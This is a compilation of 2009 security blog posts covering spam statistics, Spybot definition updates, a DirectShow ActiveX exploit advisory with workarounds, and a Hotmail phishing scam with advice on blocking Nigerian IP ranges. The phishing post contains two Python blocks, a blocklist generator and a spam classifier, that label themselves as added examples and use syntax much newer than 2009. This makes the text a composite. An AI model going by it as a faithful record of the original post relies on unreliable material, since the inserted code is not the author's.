When TeaTimer blocks the file you can also allow the file to be executed (also remove the check mark for deletion). You can exclude any file from further detections during a scan by right clicking the item in the Spybot S&D scan result and selecting "exclude this detection from further searches".

If you keep getting false positive detections and broken programs, due to TeaTimer issues, try disabling that module. You can toggle TeaTimer off and on by switching into Advanced Mode > Tools > Resident.

False Positives are reported and discussed in the Spybot S&D False Positives Forum.

As mentioned earlier, links and more instructions about using the program, or reporting suspected false positives, are found in my article titled How to use Spybot Search & Destroy to fight malware.


July 13, 2009

My Spam analysis for July 6 - 12, 2009

This is the latest entry in my weekly series about classifications of spam, according to my custom filter rules used by MailWasher Pro. The categories are shown on the "Statistics" page > "Junk Mail," as a pie chart, based on my custom filters and blacklist. The amount of email flagged as spam is shown on the "Summary" page of Statistics.

The volume of spam coming to my various honeypots and user accounts has decreased slightly this week, after several weeks of increases. This suggests to me that some of the Botnets have once again lost their Command and Control servers, following the recent forced shutdown of colocation host Pricewert. Pricewert hosting customers included several Botnet Command and Control servers. Spammers found other hosts, but appear to be having trouble maintaining them.

The classifications of spam in my analysis can help you adjust your email filters according to what is most common, on a weekly basis. Most of the spam this week was for the fake Canadian Pharmacy, which sells illicit and counterfeit pharmaceuticals like Viagra, weight loss ripoffs and pirated software. There was even some casino spam last week.

See my extended comments for this week's breakdown of spam by category, for July 6 - 12, 2009, and the latest additions to my custom MailWasher Pro filters.

MailWasher Pro spam category breakdown for July 6 - 12, 2009. Spam amounted to 12% of my incoming email this week. This represents a 7% decrease from last week.
Known Spam Domains (a great filter!): 42.31%
Canadian Pharmacy spam: 15.38%
Viagra spam: 7.69%
Weight Loss Scams (e.g. Acai Berry): 7.69%
Casino spam: 3.85%
Male Enhancement Patches, etc: 3.85%
Yahoo Groups Spam Link: 3.85%
Counterfeit Software: 3.85%
Blacklisted Domains/Senders (e.g: kef+diz@+): 3.85%
Pharmaceutical Spam: 3.85%
HGH Scams: 3.85%

The latest weekly change to my custom MailWasher Pro filters was the deletion of the Geocities filter, which has been replaced with the Yahoo Groups spam link filter. Yahoo has done away with Geocities, which were free websites, mostly used by spammers, hobbyists and newbies to websites. A lot of this week's spam contained links to Yahoo groups and fit a predictable pattern, so I created a filter to match and delete it.

MailWasher Pro intercepts POP3 and IMAP email before you download it to your desktop email client (e.g: Microsoft Outlook, Outlook Express, Windows Live Mail) and scans it for threats or spam content, then either manually or automatically deletes any messages matching your pre-determined criteria and custom filters. It is my primary line of defense against incoming spam, scams, phishing and exploit attacks. If you are not already using this fine anti-spam tool I invite you to read about it on my MailWasher Pro web page. You can download the latest version and try it for free for a month. Registration is only required once, for the life of the program.

To protect your computer from web pages rigged with exploit codes, malware in email attachments, dangerous links to hostile web pages, JavaScript redirects, Phishing scams, or router DNS attack codes, I recommend Trend Micro Internet Security. It has strong realtime monitoring modules that stop rootkits and spam Trojans from installing themselves into your operating system. Also known as PC-cillin, it is very frequently updated as new and altered malware definitions become available and it checks for web based threats and new malware definitions by searching secure online servers owned by Trend Micro. This is referred to as "in-the-cloud" security.

All of the spam and scams targeting my accounts were either automatically deleted by my custom MailWasher Pro spam filters or, if they made it through, were reported to SpamCop, of which I am a reporting member, and manually deleted. MailWasher Pro is able to forward messages marked as spam to SpamCop, which then sends a confirmation email to you, containing a link. You must click on the enclosed reporting link and open it in your browser, then manually submit your report. This is how SpamCop wants it done.


July 8, 2009

Vulnerability in Microsoft Video ActiveX Control being exploited

There is a new vulnerability in a Microsoft ActiveX (DirectShow) control that is currently being exploited in the Wild, to take over or infect vulnerable machines. Also, the related MPEG2TuneRequest ActiveX Control Object is being exploited.

Microsoft Security Advisory (972890), published on July 06, 2009, describes the vulnerability as affecting users of various versions of Internet Explorer (web browsers), in such a way that code execution occurs from remote locations and may not require any user intervention at all. This is typical of "drive-by" ActiveX exploits. As a result, an attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Since most Windows XP users operate with full Administrator privileges, their machines could be taken over completely and without notice.

This newly-exploited vulnerability is the second unpatched DirectShow bug to surface in the last five weeks. Workarounds for the new DirectShow vulnerability are listed in my extended content.

This security advisory is like the horse that is out of the stable. This vulnerability, which was only acknowledged on Monday, July 6, had already been distributed over the past weekend via compromised websites with injected redirection codes. The compromised sites lead to a handful of payload sites hosting the exploit code, which targets msvidctl.dll, an ActiveX control for streaming video. I have read several reports (1, 2, 3) about a recent flurry of website injection compromises that started by targeting mostly Chinese servers, but has since moved to attack any server anywhere that responds to the code injection attempt.

Each compromised website acts as a zombie redirector in a botnet of websites. The payloads are hosted on Asian and Former Soviet Union servers, where take-downs of malicious sites are slow at best, and non-existent in many instances. The injected script re-routes visitors of those websites to a malicious exploit-laden site, which in turn downloads and launches a multi-exploit hacker toolkit that includes the DirectShow attack code and the KillAV malware (which tries to kill your anti virus program). DirectShow is a part of Windows' DirectX graphics infrastructure. Windows XP and Server 2003 computers appear to be the only ones directly vulnerable to this DirectShow ActiveX attack. However, Vista users who operate as Administrators, with UAC turned off are also at high risk.

How you can protect your computer against the DirectShow exploits

Until Microsoft releases a patch, tentatively set for July 14, 2009, users of XP and Server 2003 can apply the Workarounds outlined in the Microsoft Security Advisory and disable the vulnerable ActiveX controls.

Microsoft Security Advisory (972890) explains how to disable the 45 ActiveX controls provided by msvidctl.dll to mitigate this vulnerability. The Microsoft Technet blog article about this vulnerability has a button to fix the kill bits for these ActiveX Objects with one push (requires Internet Explorer). Or, better yet, alter your Internet Options to disable all ActiveX Controls in the Internet Zone, whether signed or unsigned, or marked safe or otherwise.

UPDATE - 7/10/2009
Microsoft has added Fix It and Undo workaround buttons on this security advisory support page. These offer one push solutions to set or unset the killbits for all 45 affected ClassIDs of the vulnerable ActiveX Controls. The instructions state: "To implement the workaround that disables the Microsoft Video ActiveX Control automatically on a computer that is running Windows XP or Windows Server 2003, click the Fix this problem link under Enable workaround. To undo the workaround, click the Fix this problem link under Disable workaround. Then click Run in the File Download dialog box, and follow the steps in this wizard."

Whether you choose to run the Fix It buttons in a browser, or download the Fix It file (it has a .msi extension, so it cannot be started with right-click "Run as" administrator), you will need to run them from an account that has Administrator privileges (unfortunately). XP users operating as Limited or Power Users will need to close Internet Explorer, fast-switch into an Administrator level account, run the fix (file or browser) tool, log out of the Admin account, then log back into your reduced privileges (safer) account. When you re-open Internet Explorer the killbits for the affected ActiveX controls will be set. You survive to surf another day! You're welcome!

I also recommend that you further protect your computers by downloading Mozilla's Firefox browser and surfing the web with it, exclusively (Firefox offers to import IE cookies and Favorites during setup). Firefox doesn't recognize or run any ActiveX controls, making it safer out of the box. Also, any critical bugs in Firefox are usually patched very quickly, to protect the users from exploits via their Firefox browsers. Always use the latest version of Firefox and set the checking for updates to automatic.

In addition to affecting Internet Explorer browsers, the DirectShow exploits also target Microsoft Outlook, Outlook Express and Windows Live email clients. If you have moved your email client out of the Restricted Sites Zone, and allow HTML content to be displayed, you are at risk from email-borne exploit attacks. Even with your email client opening messages in the Restricted zone, the links in those messages will still be clickable. If you are fooled into clicking on a hostile link, chances are high that your PC will become Botnetted, or acquire a Trojan, or a downloader malware agent. The same applies to links sent to you by Bots, in hijacked Instant Messages.

This bears repeating: An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. I invite you to read my article explaining how operating with reduced user privileges protects against the installation of 92% of known malware.

The US-CERT has published a great article explaining how to secure your web browsers against most common exploit tactics. You should bookmark that page!

In closing, apply the workarounds listed in Microsoft Advisory 972890 to kill the affected ActiveX Controls (or turn OFF ActiveX altogether). Surf the interwebs with Firefox, not Internet Exploder. Finally, keep the best anti malware protection on your computer that you can afford. I use and recommend Trend Micro Internet Security 2009. If you can't afford to purchase a commercial security suite, at least get a decent free anti virus and anti-spyware/malware solution. Avira AntiVir Free and Spybot Search & Destroy are good free programs. So is MalwareBytes AntiMalware, which I use and promote.


Spybot Search and Destroy Definitions Updated on July 8, 2009

If you use Spybot Search and Destroy to protect your computer against spyware and malware, it is time again to run your manual updates. Malware writers are constantly modifying their programs to evade detection, so anti-malware vendors have to issue regular updates to keep up with the bad guys. New definitions and false positive fixes for Spybot Search and Destroy are usually released every Wednesday. This week's updates were released on schedule on July 8, 2009, as listed below. Some new and altered fake security programs were added to the detections, plus several new Trojans, rootkits and modified spam bots.

Updating Spybot Search and Destroy

Before you update Spybot Search and Destroy make sure you have the latest official version. Older versions are no longer supported and will cause you a lot of grief when you immunize and scan for problems. Only download Spybot S&D from the official website, at: spybot.info, or from its alternate domain: Safer-Networking.org. Fake versions with similar names will rip you off for payment to remove threats, whereas the real Spybot S&D is free (donations gladly accepted).

In case you are new to Spybot S&D, there are two ways to update the program and malware definitions. The preferred method (For Windows PCs) is to go to Start > (All) Programs > Spybot - Search & Destroy > Update Spybot - S&D. The independent update box will open. Leave the default options as is, unless you need all languages or want beta definitions, and click on "Search." Another box will open with "mirror" locations around the world where you can download updates. Select a location nearest to you from the list and click on "Continue." Make sure all updates are checked, then click on "Download." If all definitions are verified as being correct the check marks will disappear from the check boxes and be replaced with green arrow graphics. However, sometimes one or more mirror locations have not updated all of the definitions and you will get a red X for those definitions. Click on Go Back, select a different mirror, and try again. I have consistent success using Giganet or the Safer-Networking servers. When all updates have succeeded, click on "Exit."

Download links and more instructions about using Spybot Search and Destroy are in my article titled "How to use Spybot Search & Destroy to fight malware".

The description of the latest definition updates and false positive fixes are in my extended comments below.

Additions to malware definitions made on July 8, 2009:

Hijackers
+ CnsMin

Keyloggers
+ Win32.GhostKeyLogger.c

Malware (Includes rogue or fraudulent security programs, fake registry cleaners, and fake security alerts, plus other nasty programs)
+ Fraud.MalwareDefender2009
+ Fraud.Sysguard
+ Fraud.SystemGuard2009
+ Fraud.XPDeluxeProtector
+ Mirar
+ Smitfraud-C.
+ Win32.Agent.ieu
+ Win32.Agent.oyo
+ Win32.FraudLoad
+ Win32.Virut.mtt

PUPS (Possibly UnPopular Software or Potentially Unwanted Program)
+ MyWay.MyWebSearch (Most prevalent malware detection last week)

Spyware
+ Marketscore.RelevantKnowledge

Trojans (Trojans come to you disguised as something useful, or as a missing codec required to view a spammed video, but, like the Trojan Horse of antiquity, they hold dangerous contents that cause great harm! Many of these Trojans are Botnet infections, backdoors, malicious download agents and Rootkits.)
+ Hupigon
+ Win32.Adload.jm
+ Win32.Agent.amwr
+ Win32.Agent.as
+ Win32.Agent.gpr
+ Win32.Agent.kds
+ Win32.Agent.MSO
+ Win32.Ertfor
+ Win32.Knock.it
+ Win32.Koobface
+ Win32.TDSS.clt
+ Win32.TDSS.gen
+ Win32.TDSS.reg
+ Win32.TDSS.rtk
+ Win32.VB.iin
+ Win32.ZBot

Total: 1446905 fingerprints in 493864 rules for 4747 products.

False positive detections reported, discussed, or fixed this week:

There is a confirmed False Positive detection of "Win32.SharaQQ.30" in a file named "SVKP.sys" - which was distributed in some older versions of TweakXP. If you have TweakXP installed and Spybot moved that file, uninstall it, then download and install the newest version of TweakXP.

The changes to the Spybot detection database did not make it for the update today so they will be released with the next update scheduled for Wednesday 2009-07-15. Until then you can mark the detection on the svkp.sys and the service belonging to it to be ignored from further searches.

There was a confirmed False Positive detection of "Win32.TDSS.reg" on a computer equipped with a SkyNet HDTV Tuner card. Another user who doesn't have that tuner reported the same detection, but it is indeed malware. If you have the Skynet HDTV tuner it is probably a FP and was fixed with last week's updates.

Another false positive caused programs like Web CEO to break. That FP was fixed with the July 1 updates.

After you update definitions to fix false positives a restart of either TeaTimer or the Computer is required. If this doesn't fix the false positives, you may need to reset the TeaTimer detection list, as follows:

Right click the (TeaTimer) Resident tray icon
Select "Reset lists"

If that fails also, please read the rest of the things to try on this forum page, in replies #2 and #4.

When TeaTimer blocks the file you can also allow the file to be executed (also remove the check mark for deletion). You can exclude any file from further detections during a scan by right clicking the item in the Spybot S&D scan result and selecting "exclude this detection from further searches".

If you keep getting false positive detections and broken programs, due to TeaTimer issues, try disabling that module. You can toggle TeaTimer off and on by switching into Advanced Mode > Tools > Resident.

False Positives are reported and discussed in the Spybot S&D False Positives Forum.

As mentioned earlier, links and more instructions about using the program, or reporting suspected false positives, are found in my article titled How to use Spybot Search & Destroy to fight malware.


July 5, 2009

My Spam analysis for June 29 - July 5, 2009

This is the latest entry in my weekly series about classifications of spam, according to my custom filter rules used by MailWasher Pro. The categories are shown on the "Statistics" page > "Junk Mail," as a pie chart, based on my custom filters and blacklist. The amount of email flagged as spam is shown on the "Summary" page of Statistics.

The volume of spam coming to my various honeypots and user accounts has increased slightly again this week. This indicates to me that some of the Botnets that lost their Command and Control servers following the forced shutdown of colocation host Pricewert have found other server hosts that allow illegal activities. Thus, sleeping zombie bots are awakening and spamming again.

The classifications of spam in my analysis can help you adjust your email filters according to what is most common, on a weekly basis. Most of the spam this week was for various fake pharmacies, which sell illicit and counterfeit pharmaceuticals like Viagra, weight loss scams and phishing scams.

See my extended comments for this week's breakdown of spam by category, for June 29 - July 5, 2009, and the latest additions to my custom MailWasher Pro filters.

MailWasher Pro spam category breakdown for June 29 - July 5, 2009. Spam amounted to 19% of my incoming email this week. This represents a 6% increase from last week.
Known Spam Domains: 31.58%
Male Enhancement Patches, etc: 18.42%
"Other filters": (See my MWP Filters page) 15.79%
Phishing Scams (bank or credit card): 5.26%
Counterfeit Watches: 5.26%
Blacklisted Domains/Senders (e.g: kef+diz@+): 5.26%
Diploma Scams: 5.26%
Weight Loss Scams (e.g. Acai Berry): 2.63%
Canadian Pharmacy spam: 2.63%
Counterfeit Software: 2.63%
Hidden ISO or ASCII Subject: 2.63%
Subject All Capital Letters: 2.63%

The latest weekly additions to my custom MailWasher Pro filters include updates to the Male Enhancement [S] spam filter. Most of the known spam domains, Known Spam Subjects and Known Spam From/Body emails lead to bogus male enhancement solutions, like the fake Canadian Pharmacy sites, now hosted on Chinese domains and servers. This has been the major theme of spam for several years now. There must be a lot of suckers out there, still falling for these fake Chinese male enhancement scams.

MailWasher Pro intercepts POP3 and IMAP email before you download it to your desktop email client (e.g: Microsoft Outlook, Outlook Express, Windows Live Mail) and scans it for threats or spam content, then either manually or automatically deletes any messages matching your pre-determined criteria and custom filters. It is my primary line of defense against incoming spam, scams, phishing and exploit attacks. If you are not already using this fine anti-spam tool I invite you to read about it on my MailWasher Pro web page. You can download the latest version and try it for free for a month. Registration is only required once, for the life of the program.

To protect your computer from web pages rigged with exploit codes, malware in email attachments, dangerous links to hostile web pages, JavaScript redirects, Phishing scams, or router DNS attack codes, I recommend Trend Micro Internet Security. It has strong realtime monitoring modules that stop rootkits and spam Trojans from installing themselves into your operating system. Also known as PC-cillin, it is very frequently updated as new and altered malware definitions become available and it checks for web based threats and new malware definitions by searching secure online servers owned by Trend Micro. This is referred to as "in-the-cloud" security.

All of the spam and scams targeting my accounts were either automatically deleted by my custom MailWasher Pro spam filters or, if they made it through, were reported to SpamCop, of which I am a reporting member, and manually deleted. MailWasher Pro is able to forward messages marked as spam to SpamCop, which then sends a confirmation email to you, containing a link. You must click on the enclosed reporting link and open it in your browser, then manually submit your report. This is how SpamCop wants it done.


July 2, 2009

New Nigerian phishing scam targets Hotmail users

Today I received an unusual phishing scam that I traced to Lagos, Nigeria. It is disguised as an urgent message from the Windows Live Team, to all Hotmail subscribers. The subject was: "LAST WARNING (ACCOUNT ALERT)" - in all capital letters - as is typical of Nigerian 419 scammers. The email claims that Hotmail is overloaded with free user accounts and must prune unused accounts to free up resources. What a bunch of hooey! Anyway, the intended victim is asked for his or her Hotmail address and password (Microsoft already knows this), date of birth (why would Microsoft need that?) and location. The details are supposed to be filled out in the enclosed form and submitted to the scammers.

This is a phishing scam looking to steal active Hotmail accounts for use as spam sending zombies, using Hotmail's good reputation to avoid email sender blockades. The phished date of birth information can be crosschecked against other stolen or looked up details about you, or they can read your personal details saved in your Hotmail account profile, to perform identity theft. This information would then be sold to more advanced cyber criminals.

The scam email I received today was sent from the IP address 62.173.55.107, which is part of the CIDR block 62.173.32.0/19, covering all IPs between 62.173.32.0 and 62.173.63.255. This CIDR block is registered to ipNX Nigeria Limited, in Lagos, NG.

I discuss methods of preventing these Nigerian scam emails from reaching your desktop email client, or your forum members, in my extended comments.

How to block Nigerian 419 scammers

If you run a web server and have administrator (root) privileges, you can block all email coming from known Nigerian and other African IP addresses by applying my Nigerian Iptables Blocklist to the mail server (mail blockade), or Linux APF Firewall rules (total blockade). By applying the Nigerian Iptables Blocklist to your Linux/Apache server firewall you will block the listed IP ranges from all access to every website hosted on it. This includes database, email, FTP and HTTP services. To those addresses it will appear as though there is no server, or website, at the URL they request or send mail to.

If you don't have root access to the Linux OS you can still block Nigerian 419 scammers from accessing your web pages and forums via HTTP, by applying my .htaccess Nigerian Blocklist to your public web root directory .htaccess file. This requires that your website be hosted on the common Apache Web Server, running on a Linux or Unix OS.
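The two blockade styles above (firewall rules for everything or for mail only, and an .htaccess deny list for HTTP) and the CIDR arithmetic from the traced address can be reproduced with a small generator. The following is an added example, not the post's own Nigerian Iptables Blocklist or .htaccess Blocklist; the blocklist contents are constructed (the one range the post traced, plus an RFC 5737 documentation range standing in for any other entry), and the function names are my own.

```python
import ipaddress

# Constructed sample blocklist for this example. The first range is the
# one the post traced (ipNX Nigeria Limited); the second is an RFC 5737
# documentation range standing in for any other entry you would add.
BLOCKLIST_CIDRS = [
    "62.173.32.0/19",
    "192.0.2.0/24",
]

MAIL_PORTS = (25, 110)  # SMTP and POP3, the services a "mail blockade" covers


def cidr_range(cidr):
    """Return the first and last address strings covered by a CIDR block."""
    net = ipaddress.ip_network(cidr, strict=False)
    return str(net.network_address), str(net.broadcast_address)


def is_blocked(ip, cidrs=BLOCKLIST_CIDRS):
    """True when the address falls inside any listed network."""
    addr = ipaddress.ip_address(ip)
    return any(addr in ipaddress.ip_network(c, strict=False) for c in cidrs)


def iptables_rules(cidrs=BLOCKLIST_CIDRS, mail_only=True, ports=MAIL_PORTS):
    """Build iptables INPUT rules dropping packets from each network.

    mail_only=True restricts the drop to the mail ports (a "mail blockade");
    mail_only=False drops every packet from the range (a "total blockade").
    Rules are inserted at the head of the chain (-I) so that an earlier
    ACCEPT rule cannot let the traffic through first.
    """
    rules = []
    for c in cidrs:
        if mail_only:
            for p in ports:
                rules.append(f"iptables -I INPUT -s {c} -p tcp --dport {p} -j DROP")
        else:
            rules.append(f"iptables -I INPUT -s {c} -j DROP")
    return rules


def htaccess_block(cidrs=BLOCKLIST_CIDRS):
    """Build Apache 2.2 (mod_authz_host) directives for a web-root .htaccess.

    Everyone is allowed except the listed networks; with "Order Allow,Deny"
    Apache applies the Deny lines after the Allow line.
    """
    lines = ["Order Allow,Deny", "Allow from all"]
    lines.extend(f"Deny from {c}" for c in cidrs)
    return "\n".join(lines)


if __name__ == "__main__":
    first, last = cidr_range("62.173.32.0/19")
    print(f"62.173.32.0/19 covers {first} - {last}")
    print("62.173.55.107 blocked:", is_blocked("62.173.55.107"))
    print("\n".join(iptables_rules()))
    print(htaccess_block())
```

The rules are emitted as text rather than applied, so you can review them before loading them with root privileges; the .htaccess fragment uses the Apache 2.2 syntax that was current when this was written, and Apache 2.4 sites would use `Require not ip` instead.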

I provide other IP blocklists in both iptables and .htaccess formats. If you lease a dedicated server your server administrator can install the iptables blocklist rules for you. I am available for hire to install .htaccess blocklists, or to customize a blocklist for your individual websites, as long as they are hosted on Apache web servers. Use my Webmaster contact page to request a quote or to arrange for ongoing website security maintenance.

Most commercial web hosting companies offer a mail server for incoming (POP3) and outgoing (SMTP) email for their hosting customers. Most of these mail servers have the free option of turning on an email spam filter of one kind or another. Most spam filters recognize subjects in all capital letters and will flag those messages as "{SPAM}." You can then have your email client filter messages marked as SPAM to be deleted, or sent to a folder you create for questionable messages.

If you do not have your own web server for receiving your POP3 email, but still use a desktop email client (e.g. Microsoft Outlook, Outlook Express, Windows Live Mail, etc), you still have an option available to block this Nigerian crap email. I use and recommend a spam filtering email screening program called MailWasher Pro. MailWasher Pro sits on your Windows Desktop as an application between your POP3 email servers and your desktop email client. It receives email at an interval you select and screens it to identify spam and either flag it or automatically delete it. I set my Windows Live Mail client to manually download messages only when I press the Send/Receive button, which I do to download desirable messages that have been cleared by MailWasher Pro. I report any spam or scam messages that make it through my automatic deletion filters to SpamCop, through MailWasher Pro itself.

MailWasher Pro uses a combination of learning filters, a blacklist, a friends list, known spam blocklists (like SpamCop) and custom user-written filters to identify and deal with spam. I happen to write custom filters for use with the program, which can identify and either manually or automatically delete about 95% of all incoming spam and scam messages. You can learn about, or download, Wizcrafts' Custom MailWasher Filters here. There are 3 sets available, the details of which are explained on the aforementioned web page. My "Subject All Caps" filter flagged the scam message that started this article.
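The "Subject All Caps" rule, the friends list that overrides it, and the "{SPAM}" subject tagging described above can be shown on a raw message. The following is an added example, not MailWasher Pro's filter syntax or the Wizcrafts filter set; the two messages are constructed (the first mimics the scam the post describes, the second is an ordinary note from a contact), and the friends list and function names are assumptions for illustration.

```python
import email
import email.utils
import re
from email import policy

# Constructed sample messages for this example. The first mimics the scam
# the post describes (all-caps subject, first hop in the range the post
# traced); the second is a normal note from a known contact.
SCAM_RAW = """\
Received: from [62.173.55.107] by mx.example.invalid; Thu, 2 Jul 2009 10:00:00 +0000
From: "Windows Live Team" <alert@example.invalid>
To: victim@example.invalid
Subject: LAST WARNING (ACCOUNT ALERT)

Your free account will be pruned unless you reply with your password.
"""

FRIEND_RAW = """\
Received: from [198.51.100.7] by mx.example.invalid; Thu, 2 Jul 2009 11:00:00 +0000
From: "A Friend" <friend@example.invalid>
To: victim@example.invalid
Subject: LUNCH TODAY?

Usual place at noon?
"""

# Assumed "friends list": mail from these senders is never marked as spam.
FRIENDS = {"friend@example.invalid"}


def subject_is_all_caps(subject, min_letters=6):
    """True when every letter in the subject is upper case.

    Digits and punctuation are ignored, and very short subjects are skipped
    so that "FYI" or "RE:" on its own does not trigger the rule.
    """
    letters = [ch for ch in subject if ch.isalpha()]
    return len(letters) >= min_letters and all(ch.isupper() for ch in letters)


def originating_ip(raw):
    """Return the bracketed IPv4 address from the earliest Received header.

    Each hop prepends its own Received header, so the last one in the
    message is the first hop; that is the address you would report.
    """
    msg = email.message_from_string(raw, policy=policy.default)
    for hdr in reversed(msg.get_all("Received") or []):
        m = re.search(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]", str(hdr))
        if m:
            return m.group(1)
    return None


def classify(raw, friends=FRIENDS):
    """Return (verdict, reason): friends list first, then the all-caps rule."""
    msg = email.message_from_string(raw, policy=policy.default)
    sender = email.utils.parseaddr(str(msg.get("From", "")))[1].lower()
    if sender in friends:
        return "deliver", "sender on friends list"
    if subject_is_all_caps(str(msg.get("Subject", ""))):
        return "spam", "subject all caps"
    return "deliver", "no rule matched"


def tagged_subject(raw, friends=FRIENDS):
    """Return the Subject as a hosted filter would rewrite it: "{SPAM} " prefix on hits."""
    msg = email.message_from_string(raw, policy=policy.default)
    subject = str(msg.get("Subject", ""))
    verdict, _ = classify(raw, friends)
    return f"{{SPAM}} {subject}" if verdict == "spam" else subject


if __name__ == "__main__":
    for raw in (SCAM_RAW, FRIEND_RAW):
        print(classify(raw), originating_ip(raw), repr(tagged_subject(raw)))
```

The friend message has an all-caps subject too, which is why the friends list is checked first: the rule alone would have deleted it, and the whitelist is what keeps an aggressive filter usable.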

MailWasher Pro is a commercial program that you pay for once and receive free program updates for life. I've been using it for about 8 years now and have only paid once. The current version, as of July 2, 2009, is 6.51. It is fully compatible with all versions of Windows, including the soon to be released Windows 7. The current price is $39.95, for a lifetime registration.

If you use a web browser to obtain your email you are at the mercy of your email service provider to supply their users with spam protection. Check your email options to see what level of Spam blocking is available to you and apply it. You may have to white list your friends and contacts to avoid having some of their messages accidentally deleted as Spam, but it is worth the effort.

If you are one of the intended targets of this phishing scam, a Hotmail user, log in to your Hotmail account (in your browser), click on: Options (upper right area), then Junk Mail > Filters and Reporting > Choose a junk e-mail filter. Select either Low, Standard, or Exclusive and Save your choice. Next, choose when to delete junk e-mail. Last, choose whether to report junk mail to Hotmail, to help fine-tune their spam filters. Note that your Hotmail login can also be your Windows Live ID, should you need one.

Always be suspicious of any email that tries to panic you into taking an action that is against common sense. Phishing scams are designed to cause panic and make victims respond before they have a chance to think about the claims made in that email scam. This is the same tactic used by high-pressure salesmen and telephone solicitors and scamsters. Always check with the website in question to see if they really did send such an email to their users. Always type the URL manually, or use a link saved in your bookmarks, from a previous successful login. Watch for HTTPS at the beginning of any URL leading to a bank or other secure login location (like Hotmail).


July 1, 2009

Spybot Search and Destroy Definitions Updated on July 1, 2009

If you use Spybot Search and Destroy to protect your computer against spyware and malware, it is time again to run your manual updates. Malware writers are constantly modifying their programs to evade detection, so anti-malware vendors have to issue regular updates to keep up with the bad guys. New definitions and false positive fixes for Spybot Search and Destroy are usually released every Wednesday. This week's updates were released on schedule on July 1, 2009, as listed below. Some new and altered fake security programs were added to the detections, plus several new Trojans, rootkits and modified spam bots.

Updating Spybot Search and Destroy

Before you update Spybot Search and Destroy make sure you have the latest official version. Older versions are no longer supported and will cause you a lot of grief when you immunize and scan for problems. Only download Spybot S&D from the official website, at: spybot.info, or from its alternate domain: Safer-Networking.org. Fake versions with similar names will rip you off for payment to remove threats, whereas the real Spybot S&D is free (donations gladly accepted).

In case you are new to Spybot S&D, there are two ways to update the program and malware definitions. The preferred method (For Windows PCs) is to go to Start > (All) Programs > Spybot - Search & Destroy > Update Spybot - S&D. The independent update box will open. Leave the default options as is, unless you need all languages or want beta definitions, and click on "Search." Another box will open with "mirror" locations around the world where you can download updates. Select a location nearest to you from the list and click on "Continue." Make sure all updates are checked, then click on "Download." If all definitions are verified as being correct the check marks will disappear from the check boxes and be replaced with green arrow graphics. However, sometimes one or more mirror locations have not updated all of the definitions and you will get a red X for those definitions. Click on Go Back, select a different mirror, and try again. I have consistent success using Giganet or the Safer-Networking servers. When all updates have succeeded, click on "Exit."

Download links and more instructions about using Spybot Search and Destroy are in my article titled "How to use Spybot Search & Destroy to fight malware".

The description of the latest definition updates and false positive fixes are in my extended comments below.

Additions to malware definitions made on July 1, 2009:

Keyloggers
+ SCKeylogger

Malware (Includes rogue or fake anti-virus and anti-spyware programs and fake registry cleaners and fake security alerts, plus other nasty programs)
+ Mirar
+ Win32.FraudLoad.edt
++ Win32.Perlovga.a

PUPS (Possibly UnPopular Software or Potentially Unwanted Program)
+ GameVance
+ OriginalSolitaire

Trojans (Trojans come to you disguised as something useful, or as a missing codec required to view a spammed video, but, like the Trojan Horse of antiquity, they hold dangerous contents that cause great harm! Many of these Trojans are Botnet infections, backdoors and Rootkits.)
+ Win32.Agent.ext
+ Win32.Agent.fbx
++ Win32.AutoRun.wqh
++ Win32.Buzus.aspx
++ Win32.Dontovo
+ Win32.FraudLoad.pd
+ Win32.Seneka.rtk
+ Win32.TDSS.clt
+ Win32.TDSS.dt
++ Win32.TDSS.reg
+ Win32.TDSS.rtk
+ Win32.ZBot

Total: 1436805 fingerprints in 491598 rules for 4715 products.

False positive detections reported or fixed this week:

Two confirmed false positives were reported and fixed since last week. They are as follows...

A confirmed false positive detection of "Win32.Agent.Bbzv" in the file: C:\Program Files\erunt\autoback.exe, has been fixed with the July 1 updates.

A confirmed false positive detection of "Win32.Agent.Bbzv" in both WordWeb Free and Pro (Wweb32.exe) versions was fixed today.

After you update definitions to fix false positives a restart of either TeaTimer or the Computer is required.

When TeaTimer blocks the file you can also allow the file to be executed (also remove the check mark for deletion). You can exclude any file from further detections during a scan by right-clicking the item in the Spybot S&D scan results and selecting "exclude this detection from further searches".

False Positives are reported and discussed in the Spybot S&D False Positives Forum.

As mentioned earlier, links and more instructions about using the program, or reporting suspected false positives, are found in my article titled How to use Spybot Search & Destroy to fight malware.


About the author

Wiz's Blog is written by Bob "Wiz" Feinberg, an experienced freelance computer consultant, troubleshooter and webmaster. Wiz's specialty is in computer and website security. Wizcrafts Computer Services was established in 1996.


This weblog is licensed under a Creative Commons License. The content on this blog may be reprinted provided you do not modify the content and that you give credit to Wizcrafts and provide a link back to the blog home page, or to the individual blog articles you wish to reprint. Commercial use, or derivative work, requires written permission from the author.